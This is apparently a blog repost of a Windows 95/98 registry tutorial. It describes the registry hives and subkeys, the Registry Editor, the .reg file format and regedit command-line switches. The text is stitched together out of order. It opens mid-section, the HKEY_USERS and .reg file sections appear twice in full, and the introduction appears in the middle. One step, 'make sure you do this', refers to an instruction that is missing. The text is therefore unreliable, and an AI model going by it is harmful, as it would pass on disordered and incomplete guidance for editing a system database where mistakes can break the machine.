Config Manager This key contains all hardware information problem codes, with their status. There is also the sub key HKEY_LOCAL_MACHINE\Enum, but written in a different way. PerfStats It contains performance data about system and network
HKEY_USERS This important key contains the sub key .Default and another key for each user that has access to the computer. If there is just one user, only .Default key exists. . Each sub key maintains the preferences of each user, like the desktop colors, the fonts used, and also the settings of many programs. If you open a user subkey you will find five important subkeys:
AppEvent It contains the path of audio files that Windows plays when some events happen. Control Panel Here are the settings defined in the Control Panel. They used to be stored in win.ini and control.ini. Keyboard Layouts It contains a voice that identify the actual keyboard disposition how it is set into the Control Panel. Network This key stores subkeys that describe current and recent network shortcuts. RemoteAccess The settings of Remote Access are stored here. Software Contains all software settings. This data was stored in win.ini and private .ini files. HKEY_CURRENT_USER It is an alias to current user of HKEY_USERS. If your computer is not configured for multi-users usage, it points to the subkey .Default of HKEY_USERS.
Description of .reg file
Here I am assuming that you already have a .reg file on your hard disk and want to know more about how it is structured.Now do not double click the .reg file or it's content will be added to the registry, of course there will be warning message that pops up. Now to view the properties of the .reg file open it in notepad.To do so first launch notepad by going to Start>Programs>Accessories>Notepad.Then through the open menu open the .reg file.Now the thing that differentiates .reg files from other files is the word REGEDIT4. It is found to be the first word in all .reg files. If this word is not there then the registry editor cannot recognize the file to be a .reg file. Then follows the key declaration which has to be done within square brackets and with the full path.If the key does not exist then it will be created.After the key declaration you will see a list of values that have to be set in the particular key in the registry.The values look like this: "value name"=type:value Value name is in double commas. Type can be absent for string values, dword: for dword values and hex: for binary values and for all other values you have to use the code hex(#): , where # indicate the API code of the type.
Published on Black Sun Research Facility -Important Note: expand string has API code = 2 and extended string has API code = 7.
As you can see, strings are in double quotes, dword is hexadecimal and binary is a sequence of hexadecimal byte pairs, with a comma between each. If you want to add a back slash into a string remember to repeat it two times, so the value "c:\Windows" will be "c:\\Windows". Before write a new .reg file, make sure you do this else you will get an error message.
Command Line Registry Arguments
FILENAME.REG to merge a .reg file with the registry /L:SYSTEM to specify the position of SYSTEM.DAT /R:USER to specify the position of USER.DAT /e FILENAME.REG [KEY] to export the registry to a file. If the key is specified, the whole branch will be exported./c FILENAME.REG to substitute the entire registry with a .reg file /s to work silently, without prompt information or Warnings.
That wraps up the Windows Registry
The registry is a hierarchical database that contains virtually all information about your computer's configuration. Under previous version of Windows, those setting where contained in files like config.sys, autoexec.bat, win.ini, system.ini, control.ini and so on. From this you can understand how important the registry is. The structure of the registry is similar to the ini files structure, but it goes beyond the concept of ini files because it offers a hierarchical structure, similar to the folders and files on hard disk. In fact the procedure to get to the elements of the registry is similar to the way to get to folders and files. In this section I would be examing the Win95\98 registry only although NT is quite similar.
The Registry EditorThe Registry Editor is a utility by the filename regedit.exe that allows you to see, search, modify and save the registry database of Windows. The Registry Editor doesn't validate the values you are writing: it allows any operation. So you have to pay close attention, because no error message will be shown if you make a wrong operation. To launch the Registry Editor simply run RegEdit.exe ( under WinNT run RegEdt32.exe with administer privileges). The registry editor is divided into two sectios in the left one there is a hierarchical structure of the database (the screen looks like Windows Explorer) in the right one there are the values. The registry is organized into keys and subkeys. Each key contains a value entry , each one has a name, a type or a class and the value itself. The name is a string that identifies the value to the key. The length and the format of the value is dependent on the data type.
As you can see with the Registry Editor, the registry is divided into five principal keys: there is no way to add or delete keys at this level. Only two of these keys are effectively saved on hard disk: HKEY_LOCAL_MACHINE and HKEY_USERS. The others are jusr branches of the main keys or are dynamically created by Windows.
HKEY_LOCAL_MACHINE This key contains any hardware, applications and services information. Several hardware information is updated automatically while the computer is booting. The data stored in this key is shared with any user. This handle has many subkeys:
Config Contains configuration data for different hardware configurations. Enum This is the device data. For each device in your computer, you can find information such as the device type, the hardware manufacturer, device drivers and the configuration. Hardware This key contains a list of serial ports, processors and floating point processors.Network Contains network information. Security Shows you network security information. Software This key contains data about installed software.System It contains data that checks which device drivers are used by Windows and how they are configured.
HKEY_CLASSES_ROOT This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes and contains OLE, drag'n'drop, shortcut and file association information.
HKEY_CURRENT_CONFIG This key is also an alias. It contains a copy of the branch HKEY_LOCAL_MACHINE\Config, with the current computer configuration.
HKEY_DYN_DATA Some information stored in the registry changes frequently, so Windows maintains part of the registry in memory instead of on the hard disk. For example it stores PnP information and computer performance. This key has two sub keys
Config Manager This key contains all hardware information problem codes, with their status. There is also the sub key HKEY_LOCAL_MACHINE\Enum, but written in a different way. PerfStats It contains performance data about system and network
HKEY_USERS This important key contains the sub key .Default and another key for each user that has access to the computer. If there is just one user, only .Default key exists. . Each sub key maintains the preferences of each user, like the desktop colors, the fonts used, and also the settings of many programs. If you open a user subkey you will find five important subkeys:
AppEvent It contains the path of audio files that Windows plays when some events happen. Control Panel Here are the settings defined in the Control Panel. They used to be stored in win.ini and control.ini. Keyboard Layouts It contains a voice that identify the actual keyboard disposition how it is set into the Control Panel. Network This key stores subkeys that describe current and recent network shortcuts. RemoteAccess The settings of Remote Access are stored here. Software Contains all software settings. This data was stored in win.ini and private .ini files. HKEY_CURRENT_USER It is an alias to current user of HKEY_USERS. If your computer is not configured for multi-users usage, it points to the subkey .Default of HKEY_USERS.
Description of .reg file
Here I am assuming that you already have a .reg file on your hard disk and want to know more about how it is structured.Now do not double click the .reg file or it's content will be added to the registry, of course there will be warning message that pops up. Now to view the properties of the .reg file open it in notepad.To do so first launch notepad by going to Start>Programs>Accessories>Notepad.Then through the open menu open the .reg file.Now the thing that differentiates .reg files from other files is the word REGEDIT4. It is found to be the first word in all .reg files. If this word is not there then the registry editor cannot recognize the file to be a .reg file. Then follows the key declaration which has to be done within square brackets and with the full path.If the key does not exist then it will be created.After the key declaration you will see a list of values that have to be set in the particular key in the registry.The values look like this: "value name"=type:value Value name is in double commas. Type can be absent for string values, dword: for dword values and hex: for binary values and for all other values you have to use the code hex(#): , where # indicate the API code of the type.
Published on Black Sun Research Facility -Important Note: expand string has API code = 2 and extended string has API code = 7.
As you can see, strings are in double quotes, dword is hexadecimal and binary is a sequence of hexadecimal byte pairs, with a comma between each. If you want to add a back slash into a string remember to repeat it two times, so the value "c:\Windows" will be "c:\\Windows". Before write a new .reg file, make sure you do this else you will get an error message.
Command Line Registry Arguments
FILENAME.REG to merge a .reg file with the registry /L:SYSTEM to specify the position of SYSTEM.DAT /R:USER to specify the position of USER.DAT /e FILENAME.REG [KEY] to export the registry to a file. If the key is specified, the whole branch will be exported./c FILENAME.REG to substitute the entire registry with a .reg file /s to work silently, without prompt information or Warnings.
That wraps up the Windows Registry
Subscribe to:
Comments (Atom)
